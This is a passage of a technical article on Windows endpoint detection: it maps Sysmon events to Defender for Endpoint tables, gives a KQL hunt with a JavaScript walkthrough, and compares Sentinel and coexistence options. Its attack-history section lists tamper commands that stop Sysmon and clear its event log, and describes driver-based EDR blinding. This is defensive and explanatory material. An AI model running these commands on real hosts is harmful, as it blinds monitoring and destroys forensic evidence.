8 CreateRemoteThread	DeviceEvents	RemoteThreadCreated	Truncated (no SourceImage hash)	Keep verbose
9 RawAccessRead	(none)	--	Omitted	Keep
10 ProcessAccess	DeviceEvents	OpenProcessApiCall	Truncated (no GrantedAccess mask)	Keep verbose, narrow targets
11 FileCreate	DeviceFileEvents	FileCreated	Full	Drop
12-14 RegistryEvent	DeviceRegistryEvents	RegistryValueSet etc.	Full	Drop
17-18 PipeEvent	(none)	--	Omitted	Keep
19-21 WmiEvent	(none)	--	Omitted	Keep
22 DNSEvent	DeviceNetworkEvents	DnsQuery	Full	Drop
23 FileDelete (archive)	DeviceFileEvents	FileDeleted	Partial (no archive)	Keep archive variant on selected paths
26 FileDeleteDetected	DeviceFileEvents	FileDeleted	Full	Drop
27 FileBlockExecutable	(none)	--	Omitted (MDE has separate prevent surface)	Keep if Sysmon is enforcing

The fidelity column is the operational answer to "do I need Sysmon if I have MDE?" Where MDE is Full, Sysmon duplicates. Where MDE is Truncated, Sysmon adds the fields MDE drops. Where MDE is Omitted, Sysmon is the only collection mechanism in the host's telemetry surface. This is the cross-walk that Hartong's sysmonconfig-mde-augment.xml implements as XML rules.
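The same reasoning can be expressed as data plus one rule. In this sketch the fidelity values are copied from the cross-walk table; the rule "Full means drop, anything else means keep" is the sketch's own simplification, since the Hartong config refines individual rows (narrowing EID 10 targets, keeping EID 27 only when Sysmon is enforcing).

```javascript
// The cross-walk above as data, with a coarse keep/drop rule derived from the
// fidelity column alone. The rule is a simplification of the Hartong config.

const crosswalk = [
  { eid: "1", name: "ProcessCreate", fidelity: "Full" },
  { eid: "3", name: "NetworkConnect", fidelity: "Full" },
  { eid: "7", name: "ImageLoad", fidelity: "Full" },
  { eid: "8", name: "CreateRemoteThread", fidelity: "Truncated" },
  { eid: "9", name: "RawAccessRead", fidelity: "Omitted" },
  { eid: "10", name: "ProcessAccess", fidelity: "Truncated" },
  { eid: "11", name: "FileCreate", fidelity: "Full" },
  { eid: "12-14", name: "RegistryEvent", fidelity: "Full" },
  { eid: "17-18", name: "PipeEvent", fidelity: "Omitted" },
  { eid: "19-21", name: "WmiEvent", fidelity: "Omitted" },
  { eid: "22", name: "DNSEvent", fidelity: "Full" },
  { eid: "23", name: "FileDelete (archive)", fidelity: "Partial" },
  { eid: "26", name: "FileDeleteDetected", fidelity: "Full" },
  { eid: "27", name: "FileBlockExecutable", fidelity: "Omitted" },
];

function sysmonRole(fidelity) {
  if (fidelity === "Full") return "duplicates MDE: drop";
  if (fidelity === "Omitted") return "only collector: keep";
  return "adds fields MDE drops: keep"; // Truncated or Partial
}

for (const r of crosswalk) console.log(`EID ${r.eid} ${r.name}: ${sysmonRole(r.fidelity)}`);

const keep = crosswalk.filter((r) => r.fidelity !== "Full").map((r) => r.eid);
console.log(keep.join(", ")); // 8, 9, 10, 17-18, 19-21, 23, 27
```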

The Kusto Hunt: PowerShell instances that called out within sixty seconds of spawn

The single most-frequently-cited hunting query in the Defender XDR field is some variation of the following. The query joins DeviceProcessEvents to DeviceNetworkEvents on (DeviceId, InitiatingProcessId) and surfaces every PowerShell instance that opened an outbound network connection within sixty seconds of being spawned. This is the query that turns Maya's hunch ("that base64-encoded command looks bad") into a SIEM-routable signal:

// The Kusto Hunt: PowerShell instances that called out within
// 60s of process create, joined on (DeviceId, InitiatingProcessId).
DeviceProcessEvents
| where Timestamp > ago(24h)
| where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
| project DeviceId, ProcessId, ProcessCreationTime = Timestamp,
          ParentImage = InitiatingProcessFileName,
          ParentCmd   = InitiatingProcessCommandLine,
          ProcessCmd  = ProcessCommandLine,
          User        = AccountUpn
| join kind=inner (
    DeviceNetworkEvents
    | where Timestamp > ago(24h)
    | where ActionType == "ConnectionSuccess"
    | project DeviceId, InitiatingProcessId, NetTime = Timestamp,
              RemoteIP, RemotePort, RemoteUrl
) on DeviceId, $left.ProcessId == $right.InitiatingProcessId
| where (NetTime - ProcessCreationTime) between (0s .. 60s)
| where RemoteIP !startswith "10."
    and RemoteIP !startswith "192.168."
    and not(RemoteIP matches regex "^172\\.(1[6-9]|2[0-9]|3[0-1])\\.")
| project DeviceId, ProcessCreationTime, NetTime,
          ParentImage, ProcessCmd, RemoteIP, RemotePort, RemoteUrl, User
| order by NetTime desc

The query is about a dozen operators long and exercises four of KQL's most useful primitives: join (on a tuple key), between (for time-window matching), !startswith and the regex check (for RFC 1918 exclusion), and project (for column shaping). The between (0s .. 60s) is the crux. A legitimate PowerShell launched by a logon script may also produce a network connection within the same minute -- the filter is necessary but not sufficient. Adding where ParentImage in~ ("winword.exe", "excel.exe", "outlook.exe") narrows the hunt to the Office-spawning-PowerShell pattern that fits the Emotet and Qbot families; the case-insensitive in~ matters because the parent image name may be recorded in upper case (WINWORD.EXE). Matching RemoteUrl or RemoteIP against the tenant's own threat-intelligence indicator list narrows the hunt further to known-bad indicators.

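// JavaScript that walks through the logic of the KQL hunt.
// The actual query runs in Advanced Hunting; this runs in Node.js or a browser
// console so you can see the join semantics on a small synthetic dataset.

const processEvents = [
  { DeviceId: "D1", ProcessId: 7700, Timestamp: 100, FileName: "powershell.exe", InitiatingProcessFileName: "WINWORD.EXE", ProcessCommandLine: "powershell.exe -enc JABzAD0A..." },
  { DeviceId: "D2", ProcessId: 4422, Timestamp: 200, FileName: "powershell.exe", InitiatingProcessFileName: "explorer.exe", ProcessCommandLine: "powershell.exe -Help" },
];

const networkEvents = [
  { DeviceId: "D1", InitiatingProcessId: 7700, Timestamp: 130, ActionType: "ConnectionSuccess", RemoteIP: "185.243.115.84", RemotePort: 443 },
  { DeviceId: "D2", InitiatingProcessId: 4422, Timestamp: 215, ActionType: "ConnectionSuccess", RemoteIP: "10.0.0.5", RemotePort: 443 },
];

// RFC 1918 check, mirroring the three RemoteIP filters in the KQL.
function isPrivate(ip) { return ip.startsWith("10.") || ip.startsWith("192.168.") || /^172\.(1[6-9]|2[0-9]|3[0-1])\./.test(ip); }

// where FileName =~ "powershell.exe" or FileName =~ "pwsh.exe"
const isPowerShell = (name) => ["powershell.exe", "pwsh.exe"].includes(name.toLowerCase());

const hits = [];
for (const p of processEvents.filter((e) => isPowerShell(e.FileName))) {
  for (const n of networkEvents) {
    // join ... on DeviceId, $left.ProcessId == $right.InitiatingProcessId
    if (n.DeviceId !== p.DeviceId || n.InitiatingProcessId !== p.ProcessId) continue;
    if (n.ActionType !== "ConnectionSuccess") continue;
    // where (NetTime - ProcessCreationTime) between (0s .. 60s); timestamps are seconds here
    const delta = n.Timestamp - p.Timestamp;
    if (delta < 0 || delta > 60 || isPrivate(n.RemoteIP)) continue;
    hits.push({ DeviceId: p.DeviceId, ProcessCreationTime: p.Timestamp, NetTime: n.Timestamp, ParentImage: p.InitiatingProcessFileName, ProcessCmd: p.ProcessCommandLine, RemoteIP: n.RemoteIP, RemotePort: n.RemotePort });
  }
}
hits.sort((a, b) => b.NetTime - a.NetTime); // order by NetTime desc

console.log(JSON.stringify(hits, null, 2));
// Expected output: one hit on D1 (WINWORD-spawned powershell to public IP);
// D2 is filtered out (RemoteIP is RFC 1918 private).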

The semantic of the KQL is the semantic of the JavaScript: a relational join on a composite key, filtered by a time-window predicate and a network-class predicate. The KQL query is shorter and faster; the JavaScript is what the join is actually doing. Once a reader internalizes this pattern, the rest of the Advanced Hunting surface unfolds from it -- every other detection in the field is a variant of "join Device* table A to Device* table B on (DeviceId, InitiatingProcessId), filter by time and content."

Advanced Hunting per-query quotas are 100,000 rows of returned data and 10 minutes of execution time per call [@advanced-hunting-overview]. The practical workaround for queries that exceed either limit is to pre-filter with a tighter time window (Timestamp > ago(1h) instead of ago(24h)), or to push the heavy aggregation into a Sentinel scheduled analytics rule that runs every hour and materializes the result table for further hunting.
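The tighter-window workaround amounts to slicing one large hunt into several small ones. A minimal sketch that generates one KQL time predicate per hour of a 24-hour lookback; the helper is hypothetical, and actually submitting each query (through the portal or an API) is out of scope here.

```javascript
// Sketch: split a long hunt into hourly windows and emit one KQL time
// predicate per window, keeping each call further from the per-query quotas.
// The helper is hypothetical; query submission is out of scope.

const HOUR_MS = 3600000;

function hourlyWindows(endIso, hours) {
  const end = new Date(endIso).getTime();
  const windows = [];
  for (let i = hours; i > 0; i--) {
    const from = new Date(end - i * HOUR_MS).toISOString();
    const to = new Date(end - (i - 1) * HOUR_MS).toISOString();
    windows.push(`| where Timestamp >= datetime(${from}) and Timestamp < datetime(${to})`);
  }
  return windows;
}

const windows = hourlyWindows("2026-06-02T00:00:00Z", 24);
console.log(windows.length); // 24
console.log(windows[0]); // | where Timestamp >= datetime(2026-06-01T00:00:00.000Z) and Timestamp < datetime(2026-06-01T01:00:00.000Z)
```

One caveat for the PowerShell hunt specifically: a process created at 00:59:50 whose connection lands at 01:00:20 straddles a window edge. Widening the DeviceNetworkEvents side of each window by the 60-second join interval avoids missing those pairs.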

The same query, the same columns, the same six tables surface in two different places: the Defender XDR portal itself (at security.microsoft.com legacy or defender.microsoft.com current), and inside Microsoft Sentinel via the Defender XDR connector. The two surfaces are not the same.

9. The Microsoft Sentinel Integration Model

The same KQL query runs in two different places, but the economics of the two places are not the same, and that distinction is the one that catches detection engineers off guard. In-portal Advanced Hunting and Microsoft Sentinel both expose the same Device* tables. They do not expose them with the same retention, the same join surface, or the same cost.

The connector contract

Microsoft Sentinel's Defender XDR connector (the post-Ignite-2023 successor to the legacy Microsoft 365 Defender connector) streams Microsoft Defender XDR incidents, alerts, and Advanced Hunting events into Sentinel's Log Analytics workspace. Microsoft Learn's verbatim definition is: "The Defender XDR connector allows you to stream all Microsoft Defender XDR incidents, alerts, and advanced hunting events into Microsoft Sentinel and keeps incidents synchronized between both portals" [@sentinel-xdr-connector]. The connector exposes per-table streaming, meaning the operator picks which Device* tables to bring into Sentinel and pays per-GB ingestion only on those tables.

The connector also handles the legacy-connector transition: when enabled, "any Microsoft Defender components' connectors that were previously connected are automatically disconnected in the background" [@sentinel-xdr-connector]. If a tenant was using the legacy Microsoft Defender ATP connector or per-product Defender connectors, those get retired when the unified Defender XDR connector takes over. This is the cleanup detail that catches teams off guard during the migration -- they expect both connectors to coexist for the transition window, and they do not.

Three asymmetries

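The in-portal Advanced Hunting surface and the Sentinel surface differ most sharply on three practitioner-level axes (retention, query surface, and cost); the table adds three further operational differences: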

Dimension	In-portal Advanced Hunting	Sentinel + Defender XDR connector
Retention	30 days of raw data per query [@advanced-hunting-overview]	Configurable per-workspace, up to 12 years archive [@sentinel-xdr-connector][@ms-log-analytics-archive]
Query surface	Six core `Device*` tables plus cross-domain `AlertInfo` / `EmailEvents` / `IdentityLogonEvents` / `CloudAppEvents`	Six core `Device*` tables (per-table selection) plus the entire Log Analytics workspace -- third-party logs, custom tables, ASIM-normalized data
Cost	Included with MDE Plan 2 license	Per-GB Sentinel ingestion (current GA tier) plus per-GB archive
Detection authoring	Custom detection rules; in-portal advanced-hunting-to-alert promotion	Scheduled analytics rules; SOAR playbook triggers; automation rules
Cross-tenant hunting	Tenant-bound only	Possible via Lighthouse / Sentinel Workspaces aggregation
Live response triggers	In-portal action surface	Via Logic Apps / Defender API connector

The in-portal economics are predictable: the queries are included with the license, the retention is uniform at thirty days, the surface is the six tables plus the cross-domain entity catalogue. The Sentinel economics are flexible but billable: longer retention, more table coverage, more automation, all of which carry per-GB ingestion charges. The choice is operational: which queries does the team need to run on data older than thirty days?
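That operational question reduces to a lookback check. A minimal sketch, with the 30-day figure taken from the table above and the helper name and return labels hypothetical:

```javascript
// Sketch: route a query by how far back it needs to look. The 30-day value is
// the in-portal Advanced Hunting window; helper and labels are hypothetical.

const ADVANCED_HUNTING_DAYS = 30;
const DAY_MS = 24 * 60 * 60 * 1000;

function surfaceFor(lookbackStartIso, nowIso) {
  const ageDays = (new Date(nowIso) - new Date(lookbackStartIso)) / DAY_MS;
  return ageDays <= ADVANCED_HUNTING_DAYS ? "advanced-hunting" : "sentinel";
}

console.log(surfaceFor("2026-05-20T00:00:00Z", "2026-06-02T00:00:00Z")); // advanced-hunting
console.log(surfaceFor("2026-03-01T00:00:00Z", "2026-06-02T00:00:00Z")); // sentinel
```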

When each surface is the right one

For the SOC-analyst-driven, real-time threat-hunting workflow that §1 modeled with Maya -- thirty days back, six tables, cross-domain join into AlertInfo -- the in-portal Advanced Hunting surface is the obvious fit. For the longer-retention, multi-source, automated-analytic-rule workflow -- where detection engineers want a scheduled rule that joins DeviceProcessEvents to a third-party identity log on a normalized schema -- the Sentinel surface is the obvious fit.

The two surfaces are not exclusive. The most-cited operational pattern in 2026 is to keep the in-portal surface as the SOC-analyst hunting console (30-day retention, no cost beyond the license) and to run the Defender XDR connector into Sentinel for the subset of tables the team needs longer retention or analytics-rule scheduling on. Per-table selection keeps the per-GB ingestion bill predictable.

The Sentinel connector preserves table names but namespaces them inside the Log Analytics workspace; DeviceProcessEvents in Sentinel has the same shape as DeviceProcessEvents in the Defender XDR portal, and most queries port between the two surfaces unchanged. Some columns differ at the connector boundary -- the most common gotcha is the time-zone and timestamp representation -- but the join semantics and the cross-walk to Sysmon EIDs do not change.
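Per-table selection is predictable because the bill is a sum over the selected tables. A back-of-envelope sketch in which every number is a made-up placeholder, not a Microsoft figure; substitute the table sizes your workspace actually measures and your contracted per-GB rate.

```javascript
// Back-of-envelope sketch for per-table selection. Daily volumes and the
// per-GB price are placeholders, not Microsoft figures.

const dailyGbByTable = {
  DeviceProcessEvents: 4.0,
  DeviceNetworkEvents: 9.0,
  DeviceFileEvents: 6.0,
  DeviceRegistryEvents: 3.0,
  DeviceImageLoadEvents: 12.0,
  DeviceEvents: 5.0,
};

function monthlyIngestCost(selectedTables, pricePerGb, days = 30) {
  let gbPerDay = 0;
  for (const table of selectedTables) {
    if (!(table in dailyGbByTable)) throw new Error(`no volume estimate for ${table}`);
    gbPerDay += dailyGbByTable[table];
  }
  return { gbPerMonth: gbPerDay * days, cost: gbPerDay * days * pricePerGb };
}

const selected = ["DeviceProcessEvents", "DeviceNetworkEvents"];
console.log(monthlyIngestCost(selected, 2.0)); // { gbPerMonth: 390, cost: 780 } with these placeholders
```

Leaving a high-volume table such as DeviceImageLoadEvents in the portal only, where it is covered by the license, is the kind of decision this arithmetic makes visible.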

The portal-URL transition

A small operational detail worth naming: the Defender XDR portal lives at both security.microsoft.com (legacy, still functional) and defender.microsoft.com (current). The new URL was announced as part of the Microsoft 365 Defender to Microsoft Defender XDR rebrand at Ignite 2023 [@defender-xdr-ms-learn][@ms-ignite-2023-blog]. The rebrand changed neither the KQL substrate nor the Device* schema; queries written against the legacy URL behave identically against the new URL. This is the disambiguation §1 alluded to in its layer-7 description: the same KQL query, the same tables, against either URL.

Two query surfaces, six tables, twenty-nine Sysmon EIDs, and one operational question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone? That is §10.

10. Sysmon Plus MDE: Three Coexistence Patterns

This is the operational question of the article. The community has converged on three answers, and one of them is wrong for almost every MDE-licensed environment. The three options, in order of increasing complexity and -- in most enterprise contexts -- decreasing prevalence:

Option A: Sysmon only, no MDE

Used in air-gapped environments, unlicensed environments, and regulatory contexts that prohibit cloud-side telemetry. Sysmon on its own produces a complete event stream into the local Windows event log, which a downstream collector (Windows Event Forwarding to a central collector, Splunk's Universal Forwarder, Wazuh's Windows agent, the Elastic Endpoint integration) picks up and ships to a customer-controlled SIEM. The trade-off: no cross-tenant correlation, no cloud-side threat-intelligence join, no EtwTi (kernel security ETW provider) consumption, no Microsoft-authored detection rules. The customer owns every rule themselves.

This is the right answer in a small set of contexts and the wrong answer in the licensed-enterprise context where MDE is already deployed.

Option B: MDE only, no Sysmon

The Microsoft-recommended baseline for licensed environments. MDE's Device* schema covers the high-value Sysmon EID surface -- 1, 3, 7, 10, 11, 12-14 -- at full or near-full fidelity, and MDE adds the layers Sysmon does not have: cloud-side correlation, cross-domain joins (email, identity, cloud apps), Microsoft-authored built-in detection rules with continuous tuning, the AlertInfo/AlertEvidence evidence graph, and the SOC-actionable surface (device isolation, live response, automated investigation) [@mde-ms-learn][@ms-mitre-2024-blog].

For most MDE-Plan-2-licensed organizations without a mature detection-engineering team, Option B is the right baseline. The trade-off is that the truncations and omissions in the Device* schema -- the ProcessAccess GrantedAccess mask Sysmon EID 10 surfaces verbatim that MDE drops, the WMI consumer expressions Sysmon EIDs 19-21 capture that MDE does not surface, the RawAccessRead and PipeEvent classes Sysmon captures that MDE omits entirely -- are not available to the team's custom hunting queries. For an organization without the engineering capacity to build hunting rules on those verbose surfaces, this is rarely a binding constraint.

Option C: MDE plus tuned Sysmon (Hartong's MDE-augment)

The detection-engineering-community pattern. Run MDE as the primary EDR. Run Sysmon alongside it with olafhartong/sysmon-modular's sysmonconfig-mde-augment.xml configuration, whose explicit README design intent is "intended to augment the information and have as little overlap as possible" with MDE [@github-hartong-modular]. The augment config drops the EIDs MDE covers cleanly (1, 3, 7, 11, 12-14, 22) and keeps the EIDs MDE truncates or omits (8 with full SourceImage, 9 RawAccessRead, 10 with full GrantedAccess mask, 15 FileCreateStreamHash, 17-18 PipeEvent, 19-21 WmiEvent, 23 with archive variant on narrowly-scoped paths). The result is a Sysmon event-log stream that is purpose-built to complement MDE's Kusto stream, not duplicate it.

Key idea: If you are an MDE-licensed shop with a detection-engineering team and you are not running Hartong's sysmonconfig-mde-augment.xml, you are paying for two EDRs and getting the coverage of one. The augment config was purpose-built to make Sysmon's verbose-field surface complementary to MDE's cloud-correlation surface, not a duplicate. Standalone Sysmon next to MDE without the augment-specific exclusions is the worst of both worlds: double telemetry volume, double licensing exposure, and no incremental detection coverage.

Cost and operational complexity

The three options have different operational profiles. The summary table:

| Pattern | License posture | Telemetry volume | Operational complexity | Best used for |
|---|---|---|---|---|
| A. Sysmon only | None (free) | Medium (depends on config) | Low (one product, one config) | Air-gapped, regulatory-no-cloud, unlicensed |
| B. MDE only | MDE Plan 1 or Plan 2 | Cloud-controlled (no per-host volume bill) | Low (one product, Microsoft-managed) | Most MDE-licensed orgs without a detection-engineering team |
| C. MDE + Hartong augment | MDE Plan 2 + WEF or SIEM | High on Sysmon side (verbose EIDs); low on MDE side | High (two products, modular config, WEF or SIEM forwarder) | Detection-engineering-mature SOCs |

A small operational caution on that last point: standalone Sysmon next to MDE without the augment-specific exclusions really is the worst of both worlds. The drivers coexist fine at different Filter Manager altitudes, but the event log and downstream collector now carry every Sysmon EID the default config emits on top of everything MDE collects on the cloud side. The double-pay problem described in the key idea above is not theoretical; it shows up the first month a SOC team forgets to swap the default sysmonconfig.xml for sysmonconfig-mde-augment.xml.

The Hartong-augment-with-MDE pattern carries a second cost: the ETW manifest-provider session cap. Windows allows at most eight trace sessions to enable and receive events from the same manifest-based provider [@ms-etw-limits]. The cap is counted per provider, not across all providers: every session that enables a given provider (consumers of the EtwTi security provider, Microsoft Defender Antivirus auto-start sessions, any WPR sessions a developer might spin up) takes one of that provider's eight slots. Adding Sysmon's session takes one slot on each provider it enables. On a host with a third-party EDR that already consumes several sessions against the same provider, this can cause silent telemetry loss. Audit logman query -ets regularly.
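Because the cap is per provider, the useful audit is a count of sessions per provider rather than a count of sessions overall. The sketch below assumes you have already turned `logman query -ets` output into a mapping from session name to the providers that session enables; that parsing step is not shown, and every session name below is hypothetical. Microsoft-Windows-DNS-Client is used as the example provider because this article's FAQ names it as the ETW source Sysmon consumes for EID 22.

```python
from collections import Counter

# Documented ETW limit: at most eight trace sessions can enable the same
# manifest-based provider. The cap applies per provider, not across providers.
MANIFEST_PROVIDER_SESSION_CAP = 8


def providers_near_cap(sessions: dict[str, set[str]], headroom: int = 1) -> dict[str, int]:
    """Return {provider: session_count} for providers within `headroom` of the cap.

    `sessions` maps a trace-session name to the set of providers it enables.
    Building that inventory (for example from logman query -ets output) is
    left to the caller; the names used below are hypothetical.
    """
    counts = Counter(p for providers in sessions.values() for p in providers)
    threshold = MANIFEST_PROVIDER_SESSION_CAP - headroom
    return {p: n for p, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    # Hypothetical host: six vendor sessions plus Sysmon's session enable DNS-Client.
    inventory = {f"VendorSession{i}": {"Microsoft-Windows-DNS-Client"} for i in range(6)}
    inventory["SysmonSession"] = {"Microsoft-Windows-DNS-Client"}
    inventory["DevTrace"] = {"Microsoft-Windows-Kernel-Process"}
    print(providers_near_cap(inventory))  # {'Microsoft-Windows-DNS-Client': 7}
```

With the default `headroom=1`, a provider is flagged once a single additional session would exhaust its eight slots.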

The volume math

For sizing, assume a typical Windows endpoint generates roughly 20,000 process-create events per day under steady state (developer workstations are in this range; server volumes are higher; air-gapped jump boxes are lower) [@github-tsale-edr-telem]. The Hartong-augment config drops the high-volume EIDs MDE already collects, most significantly 1 ProcessCreate, 7 ImageLoad and 11 FileCreate, and retains only the verbose surfaces. That cuts Sysmon volume by roughly 70 to 85 percent relative to a default-config Sysmon deployment, leaving only the verbose-EID stream MDE does not surface (8, 10, 17-18 and 19-21 among others).
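The reduction figure depends entirely on your own per-EID mix, so it is worth recomputing from a pilot host before sizing a collector. A minimal sketch, assuming you have per-EID daily counts from one default-config host; the counts below are made up purely to exercise the function and are not measurements. The retained set follows the Option C description earlier in this section.

```python
def retained_fraction(daily_counts: dict[int, int], retained_eids: set[int]) -> float:
    """Fraction of default-config Sysmon event volume that an EID-level filter keeps."""
    total = sum(daily_counts.values())
    if total == 0:
        return 0.0
    kept = sum(n for eid, n in daily_counts.items() if eid in retained_eids)
    return kept / total


# EIDs the augment config keeps, per the Option C description above.
AUGMENT_RETAINED = {8, 9, 10, 15, 17, 18, 19, 20, 21, 23}

# Made-up per-EID daily counts, only to exercise the function; measure your own.
pilot = {1: 20_000, 3: 6_000, 7: 2_000, 11: 5_000, 13: 4_000, 22: 3_000,
         10: 6_000, 17: 1_000, 18: 1_000, 8: 50, 19: 5, 20: 5}

kept = retained_fraction(pilot, AUGMENT_RETAINED)
print(f"kept {kept:.1%} of default volume, a {1 - kept:.1%} reduction")
```

Filtering at the EID level is a simplification: the real augment config also scopes some retained EIDs (23, for example) to narrow paths, which lowers the kept fraction further.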

This is the operational answer to the question. For organizations with detection-engineering teams, Option C is the default. For organizations without, Option B is the default. Option A is correct in a narrow set of contexts and should be picked on purpose. The next two sections turn from the layered architecture to the layered attack surface, because every defense has an attacker.

11. The Attack Tradition: Telemetry Suppression on Both Halves of the Pipeline

If you run an EDR on a host, you have made a bet that the EDR can survive contact with an attacker who knows it is there. The history of that bet -- on both halves of the pipeline -- is a chronological story with named techniques and named CVEs. Twelve years of attack tradition reduce to a small number of attack classes plus the structural defenses that closed each one.

Sysmon-side attacks, in order

The earliest tampering technique for Sysmon was the most obvious: stop the driver. Until Sysmon v15 in June 2023, the Sysmon service was a normal Windows service, and a SYSTEM-privilege attacker had several easy options:

sc stop sysmon and sc delete sysmon to unload SysmonDrv.sys.
Rewrite the minifilter altitude so Sysmon loads after a tamper hook.
wevtutil cl Microsoft-Windows-Sysmon/Operational to erase history.
Rewrite SYSTEM\CurrentControlSet\Services\SysmonDrv\Parameters to re-program Sysmon's filter without restarting it.
Register a Windows event-channel ACL change to silence Microsoft-Windows-Sysmon.

A small family of community-published tools automated this class. The structural defense, before v15, was discipline: keep SYSTEM out of attacker hands.

The June 2023 v15 protected-process gate is the structural response to the process-tampering part of this class. Microsoft Learn states the change verbatim: "The service runs as a protected process, thus disallowing a wide range of user mode interactions" [@sysmon-ms-learn]. A SYSTEM-privilege attacker can no longer OpenProcess(PROCESS_TERMINATE) against Sysmon.exe, inject code into the service's address space, or attach a user-mode debugger. The class is not closed -- a kernel primitive still works, and a BYOVD chain that can write _EPROCESS.Protection defeats the gate -- but for attacks on the Sysmon process itself the bar moves from "a one-liner in a PowerShell window" to "a kernel exploit primitive." Log clearing is a separate case: wevtutil cl goes through the Event Log service rather than the Sysmon process, so the protected-process gate does not stop it.

MDE-side attacks, in order

The MDE-side attack tradition starts at the Antimalware-PPL boundary on MsSense.exe. The FalconForce 2022 work this article has already cited multiple times is the primary source [@falconforce-2022]. Its TL;DR, which describes how raising dbgsrv.exe to WinTcb PPL lets researchers debug MDE and capture cloud-bound payloads, and which surfaced a missing-authorization vulnerability allowing spoofed telemetry to any M365 tenant, appeared verbatim as the pull quote in §6 and is the framing this section builds on.

The technique used a PPLKiller-class BYOVD chain to raise dbgsrv.exe to WinTcb PPL, attach to MsSense.exe, and capture plaintext payloads via SspiCli!EncryptMessage instrumentation. The vulnerability that work disclosed, CVE-2022-23278, was patched on March 8, 2022 [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. That patch closed one missing-authorization gap in the cloud-side trust model. It did not close the class.

The InfoGuard Labs 2025 follow-up [@infoguard-2025] demonstrated that the broader class is still open. The technique they used was different -- in-memory patching of CRYPT32!CertVerifyCertificateChainPolicy to disable certificate-pinning validation, rather than PPL-elevated debugging -- but the vulnerability they surfaced is the same class: cloud endpoints (/edr/commands/cnc and /senseir/v1/actions/) that do not properly validate authentication tokens on traffic claiming to originate from the endpoint. As §7 documented, the MSRC disposition was low severity, no fix committed -- the operational consequence is that the spoofed-telemetry trust pattern that produced CVE-2022-23278 in 2022 is, three years later, still exploitable along a parallel surface.

The broader attack class -- ETW Threat Intelligence (EtwTi) blinding -- has been studied independently of MDE. The structural answer in 2026 is HVCI plus VBL (the Vulnerable Driver Blocklist) plus Antimalware-PPL plus ELAM (the four-component hardening stack). On a fully-hardened endpoint, the user-mode tamper surface that defined the 2014-to-2020 era of EDR-blinding tradecraft is largely closed; the residual attack surface is kernel-mode adversary primitives. That is the structural ceiling §12 picks up.

Cross-pipeline attacks

Some attacks affect both halves of the pipeline simultaneously. The most-cited is BYOVD-driven kernel-callback removal: a Bring-Your-Own-Vulnerable-Driver chain loads a legitimately signed but vulnerable driver, exploits a known CVE in that driver to obtain a kernel primitive, and uses it to remove the EDR sensor's registered callbacks, either by calling PsSetCreateProcessNotifyRoutineEx with Remove = TRUE against the sensor's routine when it has kernel code execution, or, when it has only a read/write primitive, by overwriting the sensor's entries in the kernel's internal callback arrays. Either way, both Sysmon and MDE are effectively unhooked at the kernel-callback layer. The structural defense Microsoft shipped in response is the Microsoft Vulnerable Driver Blocklist with HVCI enforcement, which has been on by default since Windows 11 22H2 [@ms-driver-blocklist].

A second cross-pipeline attack is direct-syscall bypass of user-mode hook libraries -- but this attack is mostly a relic of the 2010s, when EDR vendors relied on inline hooks patched into ntdll.dll's syscall stubs; modern Sysmon and MDE neither register nor depend on user-mode hooks for their kernel-callback events. Direct-syscall malware that bypasses the user-mode hooks of a third-party EDR will still produce a Sysmon EID 1 and an MDE DeviceProcessEvents row, because the kernel callback fires whether or not the malware called NtCreateUserProcess via ntdll.dll.

The attack-surface lattice

flowchart TD
    A1["Sysmon-side: sc stop, wevtutil clear, registry altitude swap"] --> D1[Sysmon v15 protected-process gate]
    A2["MDE-side: PPLKiller + dbgsrv WinTcb to attach MsSense"] --> D2["Antimalware-PPL on MsSense.exe"]
    A3["Cloud-side: CVE-2022-23278 spoofed cloud telemetry"] --> D3["MSRC patch March 8 2022"]
    A4["Cloud-side: InfoGuard 2025 cert-pinning bypass + missing auth"] --> O4["OPEN: 'low severity, no fix committed'"]
    A5["Cross-pipeline: BYOVD kernel-callback unhook"] --> D5["HVCI + Vulnerable Driver Blocklist (Win11 22H2+)"]
    D1 --> R["Residual: kernel-mode adversary primitive that defeats HVCI + VBL"]
    D2 --> R
    D5 --> R
    D3 --> R
    O4 -.unclosed.-> R

The shape of the lattice is the shape of the field's hardening: every user-mode attack class has a structural defense, and the structural defenses converge on a single residual -- the kernel-mode adversary primitive that defeats HVCI plus the Vulnerable Driver Blocklist. On the cloud side, the InfoGuard 2025 finding is the unresolved item -- the same trust pattern that produced CVE-2022-23278 in 2022 produced a different cluster of missing-authorization bugs three years later. The attack-defense arc is still moving, and the two-sided nature of the pipeline (host + cloud) is why.

Every attack surface has a structural defense. But every defense has a horizon. What is outside the horizon?

12. Theoretical Limits: What the Pipeline Cannot See

Sysmon and Microsoft Defender for Endpoint are observation pipelines, not enforcement layers. That distinction implies four structural ceilings the engineering cannot lift. These are not bugs to be fixed; they are properties of the architecture that follow from the choice of where the pipeline collects.

Ceiling 1: The pre-driver-load horizon

Both Sysmon's SysmonDrv.sys and Defender for Endpoint's WdBoot.sys are kernel drivers, but they sit at different points in the boot order. WdBoot.sys is ELAM-signed and loads before any non-ELAM driver, which lets it classify subsequent boot-start drivers as Good, Bad, or Unknown for the kernel's load decision. (Measured Boot separately hashes WdBoot.sys along with the bootloader and kernel into TPM PCRs; that integrity-attestation channel is a sibling feature, not ELAM's own job.) SysmonDrv.sys is BootStart-ordered but not ELAM-signed -- it loads early, but not first.

Events that happen before the EDR driver's DriverEntry runs are not observable by that driver. For Sysmon, that means rootkit-class malware that loads inside the early Windows boot path (UEFI bootkits, boot-record manipulation, very-early kernel modifications) is invisible until after Sysmon catches up. For MDE, the ELAM-signed WdBoot.sys closes most of this window for non-ELAM drivers; the residual is anything that runs even earlier -- UEFI-firmware-resident malware, hardware-implant attacks, the very narrow class that targets the pre-ELAM trust boundary itself. The Measured Boot plus Secure Boot stack (covered in adjacent articles in this series) is what observes the pre-ELAM region. EDR's reach does not extend below the ELAM line.

Ceiling 2: The observation-vs-enforcement latency gap

Sysmon's kernel-callback to event-log latency is sub-millisecond. The driver runs the rule engine, decides to emit, and writes through the ETW publisher to the Sysmon service. The service writes to the event log. The total path is microseconds in the best case, milliseconds under load.

